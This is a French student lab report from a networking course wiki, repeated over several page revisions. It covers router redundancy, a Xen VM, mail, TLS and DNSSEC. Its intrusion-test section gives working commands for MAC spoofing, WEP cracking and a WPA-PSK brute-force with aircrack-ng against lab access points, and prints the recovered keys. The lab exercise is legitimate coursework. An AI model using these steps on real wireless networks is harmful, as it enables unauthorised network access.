Même chose pour les certificats intermédiaire.<br /> </pre><br /> <br /> Je peux commencer alors la configuration d'apache2 avec mon certificat :<br /> <br /> <pre><br /> cd /etc/apache2/sites-available<br /> vim default-ssl.conf<br /> SSLCertificateFile /root/Werewolf.cer<br /> SSLCertificateKeyFile /root/Werewolf.key<br /> #SSLCertificateChainFile /root/WerewolfInter.cer<br /> <br /> 3 commandes me permettent de mettre en route le tout :<br /> a2ensite default-ssl<br /> a2enmod ssl<br /> service apache2 restart<br /> </pre><br /> <br /> Une fois cela fait, lorsque je vais sur ma page internet je remarque je peux y aller à la fois normalement c'est à dire en écrivant : http://www.hunt3r.lol/ mais aussi en utilisant la connexion sécurisée : https://www.hunt3r.lol/. On remarque qu'avec l'https on a bien un cadenas.<br /> <br /> <br /> <h3>Sécurisation de serveur DNS par DNSSEC</h3><br /> <br /> <pre><br /> cd /etc/bind<br /> vim named.conf.options ==> rajout de l'option dnssec-enable yes;<br /> mkdir hunt3r.dnssec<br /> cd hunt3r.dnssec<br /> dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE -r /dev/urandom hunt3r.dnssec<br /> dnssec-keygen -a RSASHA1 -b 1024 -n ZONE -r /dev/urandom hunt3r.dnssec<br /> Je renomme les fichiers créé en : <br /> *hunt3r-ksk.key<br /> *hunt3r-ksk.private<br /> *hunt3r-zsk.key<br /> *hunt3r-zsk.private<br /> J'inclus dans le fichier db.hunt3r : <br /> *$include /etc/bind/hunt3r.dnssec/hunt3r-ksk.key<br /> *$include /etc/bind/hunt3r.dnssec/hunt3r-zsk.key<br /> dnssec-signzone -o hunt3r.lol -k hunt3r-ksk ../db.hunter hunt3r-zsk<br /> Modification du fichier named.conf.local ==> db.hunt3r.signed<br /> service bind9 restart<br /> Copie de la clé KSK sur le site de gandi dans l'onglet gérer DNSSEC<br /> </pre><br /> <br /> <br /> '''''<h2>Réalisation</h2>'''''<br /> ----<br /> <br /> <h3> Installation de LINUX sur les nouveaux PC HP </h3><br /> J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]<br /> <br /> Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : <br /> <br /> <pre><br /> Code :<br /> root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb<br /> </pre><br /> <br /> <pre><br /> On va donc configurer le réseau nous-même.<br /> Adresse IP : 172.20.106.6<br /> Mask : 255.255.255.0<br /> Adresse passerelle : 172.20.106.254<br /> Adresse des serveurs de noms : 193.48.57.34<br /> Nom de machine : perche<br /> Domaine : deule.net<br /> <br /> Mot de passe pour superutilisateur : celui de d'habitude pour un root<br /> Nouvel utilisateur : pifou<br /> Mot de passe nouvel utilisateur : celui de d'habitude pour pifou<br /> <br /> Arrivée au partitionnement :<br /> <br /> J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. <br /> Nom du miroir de l'archive Debian : debian.polytech-lille.fr<br /> Mandataire HTTP : http://proxy.polytech-lille.fr:3128<br /> Logiciels à installer : Xfce, service SSH et utilitaies usuels du système (à valider à l'aider de la barre espace)<br /> </pre><br /> <br /> <h3> Sécurisation Wifi par WPA2-EAP </h3><br /> <br /> Maintenant je vais m'attaquer à la protection de l'accès à la borne Wifi de façon à ce qu'il soit controlé par WPA2-EAP. <br /> Pour cela je me connecte à ma VM et je réalise la configuration:<br /> <pre><br /> apt-get install FreeRadius<br /> cd /etc/bind/freeradius<br /> Modification de 3 fichiers :<br /> vim eap.conf<br /> default-eap-type = peap<br /> vim client.conf<br /> client 172.20.99.0/24<br /> {<br /> secret = secret_Werewolf<br /> shortname = wifi<br /> }<br /> vim users <br /> On enlève les commentaires au niveau de John Doe et de son mot de passe, de cette façon on aura un utilisateur.<br /> <br /> telnet 172.20.99.5<br /> <br /> aaa authentication login eap_Werewolf group radius_Werwolf<br /> radius-server host 193.48.57.8 auth-port 1812 acct-port 1813 key secret_Werewolf<br /> aaa group server radius radius_Werwolf<br /> server 193.48.57.8 auth-port 1812 acct-port 1813<br /> <br /> dot11 ssid SSID_WEREWOLF<br /> vlan 8<br /> authentication open eap eap_Werewolf<br /> authentication network-eap eap_Werewolf<br /> authentication key-management wpa<br /> <br /> encryption vlan 8 mode ciphers aes-ccm tkip<br /> <br /> ssid SSID_WEREWOLF<br /> int dot11Radio 0.8<br /> en <br /> encapsulation dot1Q 8<br /> bridge-group 8<br /> exit <br /> int gig0.8<br /> en<br /> encapsulation dot1Q 8<br /> bridge-group 8<br /> exit<br /> <br /> </pre></div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=23166 TP sysres IMA2a5 2015/2016 G6 2015-11-23T17:13:16Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> '''''<h2> Architecture réseau </h2>'''''<br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>1</th><th>default</th><th>172.20.99.0/24</th><th>172.20.99.252</th><th>172.20.99.254</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> '''''<h2> Tests d'intrusion </h2>'''''<br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.<br /> <br /> Pour cela j'installe aircrack.<br /> <br /> <pre><br /> Code : <br /> apt-get install aircrack-ng<br /> </pre><br /> <br /> <pre><br /> Modification du fichier /etc/apt/sources.list : <br /> rajout de contrib non-free<br /> <br /> Modification du fichier /etc/network/interfaces : <br /> auto eth0<br /> iface eth0 inet static <br /> address 172.20.106.6<br /> netmask 255.255.255.0<br /> gateway 172.20.106.254<br /> <br /> Modification du fichier /etc/resolv.conf : <br /> nameserver 193.48.57.34<br /> </pre><br /> <br /> <pre><br /> Code : <br /> apt-get install firmware-linux-nonfree<br /> apt-get remove network-manager<br /> apt-get install broadcom-sta-dkms<br /> modprobe wl<br /> modprobe -r b44 b43 b43legacy ssb brcmsmac<br /> modprobe -r wl<br /> modprobe wl*dmseg<br /> dmseg<br /> ifconfig -a <br /> reboot<br /> </pre><br /> <br /> A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]<br /> <br /> <br /> <pre><br /> code :<br /> airmon -ng start wlan1 ==> cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin<br /> soltion : apt-get install firmware-ralink<br /> <br /> <br /> Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0<br /> <br /> Je ré-ouvre une mon0.<br /> <br /> J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.<br /> <br /> Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.<br /> <br /> Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)<br /> <br /> code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.<br /> <br /> Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier<br /> <br /> <br /> Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! <br /> <br /> <br /> </pre><br /> <br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> On va commencer par créer un dictionnaire de clé : <br /> <br /> <pre><br /> #include <stdio.h><br /> <br /> int main (void)<br /> {<br /> int i=0;<br /> while(i<100000000)<br /> {<br /> printf("%08d\n",i);<br /> i++;<br /> }<br /> return 0;<br /> }<br /> </pre><br /> <br /> Il faut ensuite récupérer le handshake :<br /> <br /> <pre><br /> airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake<br /> </pre> <br /> <br /> J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.<br /> <br /> <pre><br /> df<br /> fdisk -l<br /> mkfs /dev/sda1<br /> mount /dev/sda1 /mnt<br /> cp handshake-01.cap /mnt<br /> umount /mnt<br /> </pre><br /> <br /> Une fois que le fichier est sur pifou, je lance le traitement :<br /> <br /> <pre><br /> aircrack-ng -w dico.txt handshake-01.cap<br /> </pre><br /> <br /> Après 58 minutes et 48 secondes la clé est trouvée : 12399908 !<br /> <br /> <br /> '''''<h2>Installation des systèmes d'exploitation</h2>'''''<br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : Connexion sur Weppes puis ssh root@193.57.48.183<br /> Pour la fermer : halt<br /> Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg<br /> </pre><br /> <br /> Je commence par installer sur la machine virtuellepostfix et bsd-mailx :<br /> <pre><br /> apt-get install postfix<br /> vim /etc/aliases ==> rajout d'une ligne admin: root<br /> newaliases<br /> apt-get install mailx<br /> </pre><br /> <br /> Maintenant lorsque j'envoie un mail à partir de n'importe quelle adresse mail vers admin@hunt3r.lol, je le reçois et via la commande mailx je peux voir que j'ai reçu un mail. <br /> <br /> En utilisant "p" je peux l'afficher.<br /> <br /> <br /> <br /> <br /> '''''<h2>Services Internet</h2>'''''<br /> ----<br /> <br /> Le nom de domaine que j'ai réservé est : hunt3r.lol<br /> <br /> <h3> Sécurisation de site web par certificat</h3><br /> <br /> Maintenant je vais réclamer mon certificat : <br /> <pre><br /> Je vais sur le site de gandi<br /> Je clique sur Certificat SSL qui est actuellement inactif<br /> Je vais dans la FAQ et je cherche comment générer une CSR ? <br /> Je récupère la commande : openssl req -nodes -newkey rsa:2048 -sha256 -keyout Werewolf.key -out Werewolf.csr que j'utilise dans ma VM<br /> Country Name (2 letter code) [AU]: FR<br /> State or Province Name (full name) [Some-State]: Nord<br /> Locality Name (eg, city) []: Lille<br /> Organization Name (eg, company) [Internet Widgits Pty Ltd]: PolytechLille<br /> Organizational Unit Namec SSLCertificateChainFile. (eg, section) []: <br /> Common Name (eg, YOUR name) []: hunt3r.lol<br /> Email Address []: admin@hunt3r.lol<br /> A challenge password []: <br /> An optional company name []:<br /> Il me génère donc deux fichiers, le .csr et le .key<br /> J'ouvre le fichier Werewolf.csr que je copie colle dans le champ CSR sur gandi.<br /> <br /> Je valide le tout et à présent sur le site de gandi j'ai : Certificat SSL : hunt3r.lol (et non plus inactif)<br /> Je valide ma demande grâce au code reçu dans ma boite mail hunt3r et j'attends le certificat.<br /> Une fois reçu je crée un fichier Werewolf.cer et je colle le certificat que j'ai récupéré.<br /> Même chose pour les certificats intermédiaire.<br /> </pre><br /> <br /> Je peux commencer alors la configuration d'apache2 avec mon certificat :<br /> <br /> <pre><br /> cd /etc/apache2/sites-available<br /> vim default-ssl.conf<br /> SSLCertificateFile /root/Werewolf.cer<br /> SSLCertificateKeyFile /root/Werewolf.key<br /> #SSLCertificateChainFile /root/WerewolfInter.cer<br /> <br /> 3 commandes me permettent de mettre en route le tout :<br /> a2ensite default-ssl<br /> a2enmod ssl<br /> service apache2 restart<br /> </pre><br /> <br /> Une fois cela fait, lorsque je vais sur ma page internet je remarque je peux y aller à la fois normalement c'est à dire en écrivant : http://www.hunt3r.lol/ mais aussi en utilisant la connexion sécurisée : https://www.hunt3r.lol/. On remarque qu'avec l'https on a bien un cadenas.<br /> <br /> <br /> <h3>Sécurisation de serveur DNS par DNSSEC</h3><br /> <br /> <pre><br /> cd /etc/bind<br /> vim named.conf.options ==> rajout de l'option dnssec-enable yes;<br /> mkdir hunt3r.dnssec<br /> cd hunt3r.dnssec<br /> dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE -r /dev/urandom hunt3r.dnssec<br /> dnssec-keygen -a RSASHA1 -b 1024 -n ZONE -r /dev/urandom hunt3r.dnssec<br /> Je renomme les fichiers créé en : <br /> *hunt3r-ksk.key<br /> *hunt3r-ksk.private<br /> *hunt3r-zsk.key<br /> *hunt3r-zsk.private<br /> J'inclus dans le fichier db.hunt3r : <br /> *$include /etc/bind/hunt3r.dnssec/hunt3r-ksk.key<br /> *$include /etc/bind/hunt3r.dnssec/hunt3r-zsk.key<br /> dnssec-signzone -o hunt3r.lol -k hunt3r-ksk ../db.hunter hunt3r-zsk<br /> Modification du fichier named.conf.local ==> db.hunt3r.signed<br /> service bind9 restart<br /> Copie de la clé KSK sur le site de gandi dans l'onglet gérer DNSSEC<br /> </pre><br /> <br /> <br /> '''''<h2>Réalisation</h2>'''''<br /> ----<br /> <br /> <h3> Installation de LINUX sur les nouveaux PC HP </h3><br /> J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]<br /> <br /> Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : <br /> <br /> <pre><br /> Code :<br /> root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb<br /> </pre><br /> <br /> <pre><br /> On va donc configurer le réseau nous-même.<br /> Adresse IP : 172.20.106.6<br /> Mask : 255.255.255.0<br /> Adresse passerelle : 172.20.106.254<br /> Adresse des serveurs de noms : 193.48.57.34<br /> Nom de machine : perche<br /> Domaine : deule.net<br /> <br /> Mot de passe pour superutilisateur : celui de d'habitude pour un root<br /> Nouvel utilisateur : pifou<br /> Mot de passe nouvel utilisateur : celui de d'habitude pour pifou<br /> <br /> Arrivée au partitionnement :<br /> <br /> J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. <br /> Nom du miroir de l'archive Debian : debian.polytech-lille.fr<br /> Mandataire HTTP : http://proxy.polytech-lille.fr:3128<br /> Logiciels à installer : Xfce, service SSH et utilitaies usuels du système (à valider à l'aider de la barre espace)<br /> </pre></div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=23164 TP sysres IMA2a5 2015/2016 G6 2015-11-23T16:56:31Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> '''''<h2> Architecture réseau </h2>'''''<br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>1</th><th>default</th><th>172.20.99.0/24</th><th>172.20.99.252</th><th>172.20.99.254</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> '''''<h2> Tests d'intrusion </h2>'''''<br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.<br /> <br /> Pour cela j'installe aircrack.<br /> <br /> <pre><br /> Code : <br /> apt-get install aircrack-ng<br /> </pre><br /> <br /> <pre><br /> Modification du fichier /etc/apt/sources.list : <br /> rajout de contrib non-free<br /> <br /> Modification du fichier /etc/network/interfaces : <br /> auto eth0<br /> iface eth0 inet static <br /> address 172.20.106.6<br /> netmask 255.255.255.0<br /> gateway 172.20.106.254<br /> <br /> Modification du fichier /etc/resolv.conf : <br /> nameserver 193.48.57.34<br /> </pre><br /> <br /> <pre><br /> Code : <br /> apt-get install firmware-linux-nonfree<br /> apt-get remove network-manager<br /> apt-get install broadcom-sta-dkms<br /> modprobe wl<br /> modprobe -r b44 b43 b43legacy ssb brcmsmac<br /> modprobe -r wl<br /> modprobe wl*dmseg<br /> dmseg<br /> ifconfig -a <br /> reboot<br /> </pre><br /> <br /> A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]<br /> <br /> <br /> <pre><br /> code :<br /> airmon -ng start wlan1 ==> cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin<br /> soltion : apt-get install firmware-ralink<br /> <br /> <br /> Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0<br /> <br /> Je ré-ouvre une mon0.<br /> <br /> J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.<br /> <br /> Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.<br /> <br /> Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)<br /> <br /> code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.<br /> <br /> Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier<br /> <br /> <br /> Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! <br /> <br /> <br /> </pre><br /> <br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> On va commencer par créer un dictionnaire de clé : <br /> <br /> <pre><br /> #include <stdio.h><br /> <br /> int main (void)<br /> {<br /> int i=0;<br /> while(i<100000000)<br /> {<br /> printf("%08d\n",i);<br /> i++;<br /> }<br /> return 0;<br /> }<br /> </pre><br /> <br /> Il faut ensuite récupérer le handshake :<br /> <br /> <pre><br /> airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake<br /> </pre> <br /> <br /> J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.<br /> <br /> <pre><br /> df<br /> fdisk -l<br /> mkfs /dev/sda1<br /> mount /dev/sda1 /mnt<br /> cp handshake-01.cap /mnt<br /> umount /mnt<br /> </pre><br /> <br /> Une fois que le fichier est sur pifou, je lance le traitement :<br /> <br /> <pre><br /> aircrack-ng -w dico.txt handshake-01.cap<br /> </pre><br /> <br /> Après 58 minutes et 48 secondes la clé est trouvée : 12399908 !<br /> <br /> <br /> '''''<h2>Installation des systèmes d'exploitation</h2>'''''<br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname 